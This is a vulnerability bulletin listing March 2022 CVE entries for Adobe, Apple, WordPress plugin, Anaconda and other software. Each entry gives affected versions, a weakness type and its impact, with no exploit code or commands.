accelerated_mobile_pages — accelerated_mobile_pages Authenticated (admin or higher user role) Stored Cross-Site Scripting (XSS) vulnerability discovered in AMP for WP – Accelerated Mobile Pages WordPress plugin (versions <= 1.0.77.31). 2022-03-18 not yet calculated CVE-2021-23150
CONFIRM
CONFIRM
accelerated_mobile_pages — accelerated_mobile_pages Multiple Authenticated (admin user role) Persistent Cross-Site Scripting (XSS) vulnerabilities discovered in AMP for WP – Accelerated Mobile Pages WordPress plugin (versions <= 1.0.77.32). 2022-03-18 not yet calculated CVE-2021-23209
CONFIRM
CONFIRM
accesslog — accesslog
 
All versions of package accesslog are vulnerable to Arbitrary Code Injection due to the usage of the Function constructor without input sanitization. If (attacker-controlled) user input is given to the format option of the package’s exported constructor function, it is possible for an attacker to execute arbitrary JavaScript code on the host that this package is being run on. 2022-03-17 not yet calculated CVE-2022-25760
MISC
MISC
admidio — admidio
 
Insufficient Session Expiration in GitHub repository admidio/admidio prior to 4.1.9. 2022-03-19 not yet calculated CVE-2022-0991
MISC
CONFIRM
adobe — acrobat_reader_dc Acrobat Reader DC version 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious font file. 2022-03-18 not yet calculated CVE-2022-24092
MISC
adobe — acrobat_reader_dc
 
Acrobat Reader DC version 21.007.20099 (and earlier), 20.004.30017 (and earlier) and 17.011.30204 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious font file. 2022-03-18 not yet calculated CVE-2022-24091
MISC
adobe — audition Adobe Audition version 14.4 (and earlier) is affected by a memory corruption vulnerability when parsing a M4A file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40740
MISC
adobe — audition Adobe Audition version 14.4 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-40737
MISC
adobe — audition Adobe Audition version 14.4 (and earlier) is affected by a memory corruption vulnerability when parsing a WAV file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40738
MISC
adobe — audition Adobe Audition version 14.4 (and earlier) is affected by a memory corruption vulnerability when parsing a M4A file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40739
MISC
adobe — audition Adobe Audition version 14.4 (and earlier) is affected by a memory corruption vulnerability, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40735
MISC
adobe — audition Adobe Audition version 14.4 (and earlier) is affected by an Access of Memory Location After End of Buffer vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-40741
MISC
adobe — audition Adobe Audition version 14.4 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-40742
MISC
adobe — audition Adobe Audition version 14.4 (and earlier) is affected by a memory corruption vulnerability, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40736
MISC
adobe — audition
 
Adobe Audition version 14.4 (and earlier) is affected by a memory corruption vulnerability when parsing a SVG file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40734
MISC
adobe — bridge Adobe Bridge version 11.1.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious WAV file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-42729
MISC
adobe — bridge Adobe Bridge version 11.1.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious PSD file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-42730
MISC
adobe — bridge Adobe Bridge version 11.1.1 (and earlier) is affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-42720
MISC
adobe — bridge Adobe Bridge version 11.1.1 (and earlier) is affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-42722
MISC
adobe — bridge Adobe Bridge 11.1.1 (and earlier) is affected by a stack overflow vulnerability due to insecure handling of a crafted file, potentially resulting in arbitrary code execution in the context of the current user. Exploitation requires user interaction in that a victim must open a crafted file in Bridge. 2022-03-16 not yet calculated CVE-2021-42728
MISC
adobe — bridge Adobe Bridge version 11.1.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-42724
MISC
adobe — bridge
 
Adobe Bridge version 11.1.1 (and earlier) is affected by a double free vulnerability when parsing a crafted DCM file, which could result in arbitrary code execution in the context of the current user. This vulnerability requires user interaction to exploit. 2022-03-16 not yet calculated CVE-2021-42533
MISC
adobe — bridge
 
Adobe Bridge version 11.1.1 (and earlier) is affected by an out-of-bounds read vulnerability when parsing a crafted .jpe file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-42719
MISC
adobe — bridge
 
Adobe Bridge version 11.1.1 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-40750
MISC
adobe — character_animator Adobe Character Animator version 4.4 (and earlier versions) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-40769
MISC
adobe — character_animator Adobe Character Animator version 4.4 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-40768
MISC
adobe — character_animator Adobe Character Animator version 4.4 (and earlier) is affected by an Access of Memory Location After End of Buffer vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-40767
MISC
adobe — character_animator Adobe Character Animator version 4.4 (and earlier versions) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-40766
MISC
adobe — character_animator Adobe Character Animator version 4.4 (and earlier) is affected by a memory corruption vulnerability when parsing a M4A file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40765
MISC
adobe — character_animator Adobe Character Animator version 4.4 (and earlier) is affected by a memory corruption vulnerability when parsing a M4A file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40764
MISC
adobe — character_animator Adobe Character Animator version 4.4 (and earlier) is affected by a memory corruption vulnerability when parsing a WAF file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40763
MISC
adobe — character_animator
 
Adobe Character Animator version 4.4 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-40762
MISC
adobe — media_encoder Adobe Media Encoder 15.4.1 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-40782
MISC
adobe — media_encoder Adobe Media Encoder 15.4.1 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-40781
MISC
adobe — media_encoder Adobe Media Encoder version 15.4.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40780
MISC
adobe — media_encoder Adobe Media Encoder version 15.4.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40779
MISC
adobe — media_encoder Adobe Media Encoder 15.4.1 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-40778
MISC
adobe — media_encoder
 
Adobe Media Encoder version 15.4.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40777
MISC
adobe — premiere_elements Adobe Premiere Elements 20210809.daily.2242976 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40787
MISC
adobe — premiere_elements Adobe Premiere Elements 20210809.daily.2242976 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40786
MISC
adobe — premiere_elements Adobe Premiere Elements 20210809.daily.2242976 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-40788
MISC
adobe — premiere_elements Adobe Premiere Elements 20210809.daily.2242976 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-40789
MISC
adobe — premiere_elements Adobe Premiere Elements 20210809.daily.2242976 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-42527
MISC
adobe — premiere_elements
 
Adobe Premiere Elements 20210809.daily.2242976 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-40785
MISC
adobe — premiere_elements
 
Adobe Premiere Elements 20210809.daily.2242976 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-42526
MISC
adobe — premiere_pro Adobe Premiere Pro version 15.4.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40793
MISC
adobe — premiere_pro Adobe Premiere Pro 15.4.1 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-40796
MISC
adobe — premiere_pro Adobe Premiere Pro 15.4.1 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-42264
MISC
adobe — premiere_pro Adobe Premiere Pro version 15.4.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40792
MISC
adobe — premiere_pro
 
Adobe Premiere Pro version 15.4.1 (and earlier) is affected by a memory corruption vulnerability due to insecure handling of a malicious file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability. 2022-03-16 not yet calculated CVE-2021-40794
MISC
adobe — premiere_pro
 
Adobe Premiere Pro 15.4.1 (and earlier) is affected by a Null pointer dereference vulnerability when parsing a specially crafted file. An unauthenticated attacker could leverage this vulnerability to achieve an application denial-of-service in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file. 2022-03-16 not yet calculated CVE-2021-42263
MISC
advanced_product_labels_for_woocommerce — advanced_product_labels_for_woocommerce
 
The Advanced Product Labels for WooCommerce WordPress plugin before 1.2.3.7 does not sanitise and escape the tax_color_set_type parameter before outputting it back in the berocket_apl_color_listener AJAX action’s response, leading to a Reflected Cross-Site Scripting 2022-03-14 not yet calculated CVE-2022-0399
CONFIRM
MISC
anaconda — anaconda3
 
Anaconda Anaconda3 through 2021.11.0.0 and Miniconda3 through 11.0.0.0 can create a world-writable directory under %PROGRAMDATA% and place that directory into the system PATH environment variable. Thus, for example, local users can gain privileges by placing a Trojan horse file into that directory. (This problem can only happen in a non-default installation. The person who installs the product must specify that it is being installed for all users. Also, the person who installs the product must specify that the system PATH should be changed.) 2022-03-17 not yet calculated CVE-2022-26526
MISC
MISC
MISC
apache — cloudstack
 
Apache CloudStack prior to 4.16.1.0 used insecure random number generation for project invitation tokens. If a project invite is created based only on an email address, a random token is generated. An attacker with knowledge of the project ID and the fact that the invite is sent, could generate time deterministic tokens and brute force attempt to use them prior to the legitimate receiver accepting the invite. This feature is not enabled by default, the attacker is required to know or guess the project ID for the invite in addition to the invitation token, and the attacker would need to be an existing authorized user of CloudStack. 2022-03-15 not yet calculated CVE-2022-26779
MISC
MISC
MLIST
apple — ios_and_ipados
 
A resource exhaustion issue was addressed with improved input validation. This issue is fixed in iOS 15.2.1 and iPadOS 15.2.1. Processing a maliciously crafted HomeKit accessory name may cause a denial of service. 2022-03-18 not yet calculated CVE-2022-22588
MISC
apple — macos_monterey
 
A privacy issue existed in the handling of Contact cards. This was addressed with improved state management. This issue is fixed in macOS Monterey 12.3. A malicious application may be able to access information about a user’s contacts. 2022-03-18 not yet calculated CVE-2022-22644
MISC
apple — macos_monterey
 
A memory corruption issue was addressed with improved memory handling. This issue is fixed in macOS Monterey 12.2. A malicious application may be able to execute arbitrary code with kernel privileges. 2022-03-18 not yet calculated CVE-2022-22591
MISC
apple — macos_monterey
 
Multiple issues were addressed by updating to curl version 7.79.1. This issue is fixed in macOS Monterey 12.3. Multiple issues in curl. 2022-03-18 not yet calculated CVE-2022-22623
MISC
apple — macos_monterey
 
An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in macOS Monterey 12.2. A malicious application may be able to execute arbitrary code with kernel privileges. 2022-03-18 not yet calculated CVE-2022-22586
MISC
apple — macos_monterey
 
This issue was addressed with improved checks. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. A person with access to a Mac may be able to bypass Login Window. 2022-03-18 not yet calculated CVE-2022-22647
MISC
MISC
MISC
apple — macos_monterey
 
An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in macOS Monterey 12.3. A remote attacker may be able to cause unexpected system termination or corrupt kernel memory. 2022-03-18 not yet calculated CVE-2022-22651
MISC
apple — macos_monterey
 
This issue was addressed with a new entitlement. This issue is fixed in macOS Monterey 12.3. An app may be able to spoof system notifications and UI. 2022-03-18 not yet calculated CVE-2022-22660
MISC
apple — macos_monterey
 
A logic issue was addressed with improved validation. This issue is fixed in macOS Monterey 12.3. A malicious application may be able to gain root privileges. 2022-03-18 not yet calculated CVE-2022-22665
MISC
apple — macos_monterey
 
A use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.3. An application may be able to execute arbitrary code with kernel privileges. 2022-03-18 not yet calculated CVE-2022-22669
MISC
apple — multiple_products The issue was addressed with additional permissions checks. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3, watchOS 8.5. A malicious application may be able to read other applications’ settings. 2022-03-18 not yet calculated CVE-2022-22609
MISC
MISC
MISC
MISC
apple — multiple_products A logic issue was addressed with improved state management. This issue is fixed in iOS 15.4 and iPadOS 15.4. An attacker in a privileged network position may be able to leak sensitive user information. 2022-03-18 not yet calculated CVE-2022-22659
MISC
apple — multiple_products A type confusion issue was addressed with improved state handling. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. An application may be able to execute arbitrary code with kernel privileges. 2022-03-18 not yet calculated CVE-2022-22661
MISC
MISC
MISC
apple — multiple_products An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in Logic Pro 10.7.3, GarageBand 10.4.6, macOS Monterey 12.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution. 2022-03-18 not yet calculated CVE-2022-22664
MISC
MISC
MISC
apple — multiple_products A memory corruption issue was addressed with improved validation. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, watchOS 8.5. Processing a maliciously crafted image may lead to heap corruption. 2022-03-18 not yet calculated CVE-2022-22666
MISC
MISC
MISC
apple — multiple_products A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.4 and iPadOS 15.4. An application may be able to execute arbitrary code with kernel privileges. 2022-03-18 not yet calculated CVE-2022-22667
MISC
apple — multiple_products An access issue was addressed with improved access restrictions. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, watchOS 8.5. A malicious application may be able to identify what other applications a user has installed. 2022-03-18 not yet calculated CVE-2022-22670
MISC
MISC
MISC
apple — multiple_products An authentication issue was addressed with improved state management. This issue is fixed in iOS 15.4 and iPadOS 15.4. A person with physical access to an iOS device may be able to access photos from the lock screen. 2022-03-18 not yet calculated CVE-2022-22671
MISC
apple — multiple_products This issue was addressed with improved checks. This issue is fixed in iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3. A user may send audio and video in a FaceTime call without knowing that they have done so. 2022-03-18 not yet calculated CVE-2022-22643
MISC
MISC
apple — multiple_products The issue was addressed with improved permissions logic. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3, watchOS 8.5. A malicious application may be able to bypass certain Privacy preferences. 2022-03-18 not yet calculated CVE-2022-22600
MISC
MISC
MISC
MISC
apple — multiple_products A user interface issue was addressed. This issue is fixed in watchOS 8.5, Safari 15.4. Visiting a malicious website may lead to address bar spoofing. 2022-03-18 not yet calculated CVE-2022-22654
MISC
MISC
apple — multiple_products Description: A permissions issue was addressed with improved validation. This issue is fixed in watchOS 8.5, iOS 15.4 and iPadOS 15.4, macOS Big Sur 11.6.5, macOS Monterey 12.3. A person with physical access to a device may be able to use Siri to obtain some location information from the lock screen. 2022-03-18 not yet calculated CVE-2022-22599
MISC
MISC
MISC
MISC
apple — multiple_products An issue with app access to camera metadata was addressed with improved logic. This issue is fixed in iOS 15.4 and iPadOS 15.4. An app may be able to learn information about the current camera view before being granted camera access. 2022-03-18 not yet calculated CVE-2022-22598
MISC
apple — multiple_products A memory corruption issue was addressed with improved validation. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. Processing a maliciously crafted file may lead to arbitrary code execution. 2022-03-18 not yet calculated CVE-2022-22597
MISC
MISC
MISC
apple — multiple_products A memory corruption issue was addressed with improved validation. This issue is fixed in watchOS 8.5, iOS 15.4 and iPadOS 15.4. An application may be able to execute arbitrary code with kernel privileges. 2022-03-18 not yet calculated CVE-2022-22596
MISC
MISC
apple — multiple_products A cross-origin issue in the IndexDB API was addressed with improved input validation. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, Safari 15.3, macOS Monterey 12.2. A website may be able to track sensitive user information. 2022-03-18 not yet calculated CVE-2022-22594
MISC
MISC
MISC
MISC
MISC
apple — multiple_products A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, Security Update 2022-001 Catalina, macOS Monterey 12.2, macOS Big Sur 11.6.3. A malicious application may be able to execute arbitrary code with kernel privileges. 2022-03-18 not yet calculated CVE-2022-22593
MISC
MISC
MISC
MISC
MISC
MISC
apple — multiple_products A logic issue was addressed with improved state management. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, Safari 15.3, macOS Monterey 12.2. Processing maliciously crafted web content may prevent Content Security Policy from being enforced. 2022-03-18 not yet calculated CVE-2022-22592
MISC
MISC
MISC
MISC
MISC
apple — multiple_products A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, Safari 15.3, macOS Monterey 12.2. Processing maliciously crafted web content may lead to arbitrary code execution. 2022-03-18 not yet calculated CVE-2022-22590
MISC
MISC
MISC
MISC
MISC
apple — multiple_products A memory corruption issue was addressed with improved input validation. This issue is fixed in iOS 15.3 and iPadOS 15.3, macOS Big Sur 11.6.3, macOS Monterey 12.2. A malicious application may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited.. 2022-03-18 not yet calculated CVE-2022-22587
MISC
MISC
MISC
apple — multiple_products An issue existed within the path validation logic for symlinks. This issue was addressed with improved path sanitization. This issue is fixed in iOS 15.3 and iPadOS 15.3, watchOS 8.4, tvOS 15.3, macOS Monterey 12.2, macOS Big Sur 11.6.3. An application may be able to access a user’s files. 2022-03-18 not yet calculated CVE-2022-22585
MISC
MISC
MISC
MISC
MISC
apple — multiple_products A memory corruption issue was addressed with improved validation. This issue is fixed in tvOS 15.3, iOS 15.3 and iPadOS 15.3, watchOS 8.4, macOS Monterey 12.2. Processing a maliciously crafted file may lead to arbitrary code execution. 2022-03-18 not yet calculated CVE-2022-22584
MISC
MISC
MISC
MISC
apple — multiple_products A permissions issue was addressed with improved validation. This issue is fixed in Security Update 2022-001 Catalina, macOS Monterey 12.2, macOS Big Sur 11.6.3. An application may be able to access restricted files. 2022-03-18 not yet calculated CVE-2022-22583
MISC
MISC
MISC
apple — multiple_products An information disclosure issue was addressed with improved state management. This issue is fixed in iOS 15.3 and iPadOS 15.3, tvOS 15.3, Security Update 2022-001 Catalina, macOS Monterey 12.2, macOS Big Sur 11.6.3. Processing a maliciously crafted STL file may lead to unexpected application termination or arbitrary code execution. 2022-03-18 not yet calculated CVE-2022-22579
MISC
MISC
MISC
MISC
MISC
apple — multiple_products A memory initialization issue was addressed with improved memory handling. This issue is fixed in Logic Pro 10.7.3, GarageBand 10.4.6, macOS Monterey 12.3. Opening a maliciously crafted file may lead to unexpected application termination or arbitrary code execution. 2022-03-18 not yet calculated CVE-2022-22657
MISC
MISC
MISC
apple — multiple_products A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Big Sur 11.6.5, Security Update 2022-003 Catalina, watchOS 8.5, macOS Monterey 12.3. An application may be able to execute arbitrary code with kernel privileges. 2022-03-18 not yet calculated CVE-2022-22614
MISC
MISC
MISC
MISC
MISC
MISC
apple — multiple_products A logic issue was addressed with improved restrictions. This issue is fixed in iOS 15.4 and iPadOS 15.4. A malicious website may be able to access information about the user and their devices. 2022-03-18 not yet calculated CVE-2022-22653
MISC
apple — multiple_products An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. Processing a maliciously crafted AppleScript binary may result in unexpected application termination or disclosure of process memory. 2022-03-18 not yet calculated CVE-2022-22627
MISC
MISC
MISC
apple — multiple_products A buffer overflow was addressed with improved bounds checking. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4. A malicious application may be able to execute arbitrary code with kernel privileges. 2022-03-18 not yet calculated CVE-2022-22634
MISC
MISC
apple — multiple_products An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4. An application may be able to gain elevated privileges. 2022-03-18 not yet calculated CVE-2022-22635
MISC
MISC
apple — multiple_products An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4. An application may be able to execute arbitrary code with kernel privileges. 2022-03-18 not yet calculated CVE-2022-22636
MISC
MISC
apple — multiple_products This issue was addressed with improved checks. This issue is fixed in iOS 15.4 and iPadOS 15.4. A person with physical access to an iOS device may be able to see sensitive information via keyboard suggestions. 2022-03-18 not yet calculated CVE-2022-22622
MISC
apple — multiple_products This issue was addressed with improved checks. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. An application may be able to read restricted memory. 2022-03-18 not yet calculated CVE-2022-22648
MISC
MISC
MISC
apple — multiple_products An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in macOS Big Sur 11.6.5, macOS Monterey 12.3, Security Update 2022-003 Catalina. An application may be able to gain elevated privileges. 2022-03-18 not yet calculated CVE-2022-22631
MISC
MISC
MISC
apple — multiple_products A null pointer dereference was addressed with improved validation. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Big Sur 11.6.5, Security Update 2022-003 Catalina, watchOS 8.5, macOS Monterey 12.3. An attacker in a privileged position may be able to perform a denial of service attack. 2022-03-18 not yet calculated CVE-2022-22638
MISC
MISC
MISC
MISC
MISC
MISC
apple — multiple_products A logic issue was addressed with improved state management. This issue is fixed in iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3. An application may be able to gain elevated privileges. 2022-03-18 not yet calculated CVE-2022-22639
MISC
MISC
apple — multiple_products A memory corruption issue was addressed with improved validation. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3, watchOS 8.5. An application may be able to execute arbitrary code with kernel privileges. 2022-03-18 not yet calculated CVE-2022-22640
MISC
MISC
MISC
MISC
apple — multiple_products A use after free issue was addressed with improved memory management. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3. An application may be able to gain elevated privileges. 2022-03-18 not yet calculated CVE-2022-22641
MISC
MISC
MISC
apple — multiple_products This issue was addressed with improved checks. This issue is fixed in iOS 15.4 and iPadOS 15.4. A user may be able to bypass the Emergency SOS passcode prompt. 2022-03-18 not yet calculated CVE-2022-22642
MISC
apple — multiple_products A logic issue was addressed with improved state management. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Big Sur 11.6.5, watchOS 8.5, macOS Monterey 12.3. A malicious application may be able to elevate privileges. 2022-03-18 not yet calculated CVE-2022-22632
MISC
MISC
MISC
MISC
MISC
apple — multiple_products A memory corruption issue was addressed with improved state management. This issue is fixed in watchOS 8.5, iOS 15.4 and iPadOS 15.4, macOS Big Sur 11.6.5, macOS Monterey 12.3. Opening a maliciously crafted PDF file may lead to an unexpected application termination or arbitrary code execution. 2022-03-18 not yet calculated CVE-2022-22633
MISC
MISC
MISC
MISC
apple — multiple_products This issue was addressed with improved checks. This issue is fixed in tvOS 15.4, iOS 15.4 and iPadOS 15.4, macOS Monterey 12.3, watchOS 8.5. A person with physical access to an iOS device may be able to see sensitive information via keyboard suggestions. 2022-03-18 not yet calculated CVE-2022-22621
MISC
MISC
MISC
MISC
apple — multiple_products A use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.2.1, iOS 15.3.1 and iPadOS 15.3.1, Safari 15.3 (v. 16612.4.9.1.8 and 15612.4.9.1.8). Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.. 2022-03-18 not yet calculated CVE-2022-22620
MISC
MISC
MISC
apple — multiple_products This issue was addressed with improved checks. This issue is fixed in watchOS 8.5, iOS 15.4 and iPadOS 15.4. A user may be able to bypass the Emergency SOS passcode prompt. 2022-03-18 not yet calculated CVE-2022-22618
MISC
MISC
